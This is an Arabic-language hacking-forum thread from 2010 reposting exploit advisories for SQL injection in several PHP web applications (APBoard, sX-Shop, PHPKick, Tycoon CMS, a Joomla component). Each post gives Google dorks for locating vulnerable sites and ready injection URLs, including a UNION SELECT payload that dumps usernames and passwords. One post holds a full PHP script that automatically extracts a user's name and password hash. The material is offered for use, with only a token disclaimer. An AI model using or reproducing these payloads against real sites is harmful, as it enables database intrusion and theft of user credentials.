√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--

Master vbspiders · 08-06-2010, 04:25 PM

كود PHP:

  #############################################################################################################

## APBoard 2.1.0  / board.php?id= SQL Injection                                           ##

## Author         : secret - mohammed.atta@hotmail.com                                   ##

## Homepage       : http://swissfaking.net/                                             ##

## Date           : 05 August, 2010                                                    ##

#############################################################################################################

  ____ ____ _____ ___   ____ ______   ____ ___   ___    _  __

  / __// __// ___// _ \ / __//_  __/  /  _// _ \ / _ |  / |/ /

 _\ \ / _/ / /__ / , _// _/   / /    _/ / / , _// __ | /    /

/___//___/ \___//_/|_|/___/  /_/____/___//_/|_|/_/ |_|/_/|_/ 

                               /___/                          

   

####################################################

# APBoard 2.1.0  / board.php?id= SQL Injection

####################################################

# Discovered by : secret

# Site          : http://swissfaking.net/

# Dork          : APBoard 2.1.0 © 2003-2010 APP - Another PHP Program

# Vendor        : http://www.php-programs.de/

# Version       : 2.1.0 and earlier

# Exploit       : http://www.yoursite.de/board/board.php?id=X[SQL INJECTION]

# Tested on     : Microsoft OS

   

e.g. http://server/board/board.php?id=6[get union columns&USERS'] (-sqlinjection)

    

########################################################################################

   

#note : IRAN owns - mohammed.atta@hotmail.com

المصدر: :: vBspiders Professional Network ::

APBoard v2>1>0 ( board>php?id=) SQL Injection Vulnerability

Master vbspiders · 08-06-2010, 04:27 PM

كود PHP:

  ########################################################################################

 

sX-Shop SQL Injection Vulnerabilities

 

########################################################################################

 

Author : CoBRa_21

Author Web Page :http://ipbul.org

Dork : "powered by sX-Shop"

Script Page : http://www.source-worx.de/

 

########################################################################################

  

Sql Injection :

 

http://localhost/[path]/index.php?product=_513' (Sql)

http://localhost/[path]/question.php?id=-513 union select version()  (Sql)

http://localhost/[path]/tell_a_friend.php?id=-500 union select version()  (Sql)

 

########################################################################################

Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR

########################################################################################

Master vbspiders · 08-09-2010, 10:03 PM

كود PHP:

 
# Exploit Title: PHPKick v0.8 statistics.php SQL Injection

# Date: August 8th, 2010

# Time: 03:45am ;(

# Author: garwga

# Version: 0.8

# Google dork : "© 2004 PHPKick.de Version 0.8"

# Category:  webapps/0day

# Code: see below

  

<?php

    echo"\n\n";

    echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";

    echo"|                                                                            |\n";

    echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";

    echo"|                                                                            |\n";

    echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";

    echo"|                                                                            |\n";

  

    echo"|Notes:This exploit works regardless of the PHP security settings            |\n";

    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";

    echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";

    echo"|      the owner of the webspace is illegal!                                 |\n";

    echo"|      I'm not responsible for any resulting damage                          |\n";

    echo"|                                                                            |\n";

    echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";

    echo"|                                                                            |\n";

    echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";

    echo"|============================================================================|\n\n\n";

  

  

if($_SERVER['argv'][1] && $_SERVER['argv'][2]){

    $host=$_SERVER['argv'][1];

    $path=$_SERVER['argv'][2];

    $spos=strpos($host, "http://");

    if(!is_int($spos)&&($spos==0)){

       $host="http://$host";

      }

    if(!$host=="http://localhost"){

       $spos=strpos($host, "http://www.");

       if (!is_int($spos)&&($spos==0)){

          $host="http://www.$host";

          }

      }

    $exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";

    echo"exploiting...\n";

    $source=file_get_contents($host.$path.$exploit);

    $username=GetBetween($source," :<br>",":");

    echo "username: $username\n";

    $hash=GetBetween($source,"<br>$username:","</td>");

    echo"hash: $hash\n";

    }

else{

    echo"\n\n";

    echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";

    echo"|                                                                            |\n";

    echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";

    echo"|                                                                            |\n";

    echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";

    echo"|                                                                            |\n";

  

    echo"|Notes:This exploit works regardless of the PHP security settings            |\n";

    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";

    echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";

    echo"|      the owner of the webspace is illegal!                                 |\n";

    echo"|      I'm not responsible for any resulting damage                          |\n";

    echo"|                                                                            |\n";

    echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";

    echo"|                                                                            |\n";

    echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";

    echo"|============================================================================|\n";

}

function GetBetween($content,$start,$end){

    $r = explode($start, $content);

    if (isset($r[1])){

        $r = explode($end, $r[1]);

        return $r[0];

    }

    return '';

}

?>

Master vbspiders · 08-09-2010, 10:05 PM

كود PHP:

  % Tycoon(CMS) Record Script Sql vulnerability

 

-------------------------------------------------------------------------------

0                             | |              | |                      | |  TM

1   _______  _ __   ___ ______| |__   __ _  ___| | _____ _ __ _ __   ___| |_

0  |_  / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|

1   / / (_) | | | |  __/      | | | | (_| | (__|   <  __/ | _| | | |  __/ |_

0  /___\___/|_| |_|\___|      |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|

1                         0xPrivate 0xSecurity 0xTeam

0       ++++++++++++++++++++++++++++++++++++++++++++++++++++

1                      A Placec Of 0days  

------------------------------------------------------------------------------

 

^Exploit Title  : Tycoon(CMS) Record Script Sql vulnerability

^Date       : 7/8/2010

^Vendor Site    : http://www.tycoon.co.kr

^MOD Version    : 1.0.9

^Author     : Silic0n (science_media017[At]yahoo.com)

^category:  : webapps/0day

^Dork       : inurl:index.php?mode=game_player

 

------------------------------------------------------------------------------

Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o ,

 Dark , XG3N , Belma(sweety), messsy , Thor ,abronsius ,Nova ,

 ConsoleFx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends .

 

My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com

 

----------------------------------->Exploit<----------------------------------

 

0x1: Goto http://{localhost}/record/index.php?mode=game_player&type=0&year=2010&game_id=-14 UNion Select 1,2,@@version

 

Version : (4.0.22-log)

 

------------------------------------------------------------------------------

Master vbspiders · 08-09-2010, 10:07 PM

كود PHP:

  view source

print?

     )   )            )                     (   (         (   (    (       )     )

  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /(

  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())

 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\

__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)

\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ /

 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' < 

  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\

                                        .WEB.ID

-----------------------------------------------------------------------

 Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability

-----------------------------------------------------------------------

Author      : v3n0m

Site        : http://yogyacarderlink.web.id/

Date        : August, 07-2010

Location    : Jakarta, Indonesia

Time Zone   : GMT +7:00

----------------------------------------------------------------

 

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Application : NeoRecruit

Version     : 1.4 Lower versions may also be affected

Vendor      : http://www.neojoomla.com/

Price       : 54,90 €

Google Dork : inurl:com_neorecruit

----------------------------------------------------------------

 

Xploit:

~~~~~~~

 

-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users--

 

Poc:

~~~~~~~

 

http://127.0.0.1/[path]/index.php?option=com_neorecruit&task=offer_view&id=[SQLi]

 

----------------------------------------------------------------

 

WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com

 

---------------------------[EOF]--------------------------------

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
ترتيب الخطوات في حقن قواعد البيانات SQL Injection	KaLa$nikoV	SQL قواعد البيانات	127	05-03-2017 08:12 PM
جميع ادوات حقن قواعد البيانات -Sql injection- {قأبل للتحديث}	Master vbspiders	SQL قواعد البيانات	280	08-24-2015 04:10 AM
Thumbs up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injection	Black-FoG	SQL قواعد البيانات	73	03-14-2014 09:08 PM
[Style] : ¨°•√♥ كل عام وانتم بخير العيدية استايل العيد الازرق الاحترافي من سنبوك لتصميم ♥√•°¨	support	قسم ستآيلات الـ vB	0	09-18-2009 11:52 PM

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--

SQL قواعد البيانات